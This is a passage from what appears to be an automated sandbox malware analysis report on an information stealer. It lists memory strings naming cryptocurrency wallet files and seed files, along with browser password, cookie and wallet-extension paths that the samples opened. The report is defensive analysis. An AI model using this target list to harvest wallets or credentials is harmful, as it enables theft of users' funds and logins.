Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: ExodusWeb3
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: MultiDoge
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\.
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
